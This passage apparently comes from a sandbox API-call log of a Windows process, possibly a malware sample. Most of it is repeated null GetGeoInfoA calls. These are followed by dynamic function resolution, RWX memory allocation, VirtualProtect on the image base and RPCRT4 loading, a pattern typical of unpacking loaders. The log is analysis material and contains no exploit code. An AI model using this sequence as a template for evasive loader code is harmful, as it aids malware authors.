GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.614] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.615] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.616] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.617] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.618] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0109.619] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0110.119] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0110.119] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0110.119] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0110.119] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0110.119] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0110.119] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0110.119] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0110.119] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0110.119] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0110.121] Module32First (hSnapshot=0x58, lpme=0x18edd8) returned 1 [0110.123] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x6190000 [0110.158] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0110.158] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0110.158] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0110.158] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0110.158] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0110.158] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0110.158] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0110.158] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0110.159] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0110.159] SetErrorMode (uMode=0x400) returned 0x0 [0110.159] SetErrorMode (uMode=0x0) returned 0x400 [0110.159] GetVersionExA (in: lpVersionInformation=0x18dd08*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18dd08*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0110.159] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x62b0000 [0110.175] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ed90 | out: lpflOldProtect=0x18ed90*=0x2) returned 1 [0110.195] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0110.195] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0110.195] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0110.195] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0110.195] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0110.195] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0110.195] LoadLibraryA 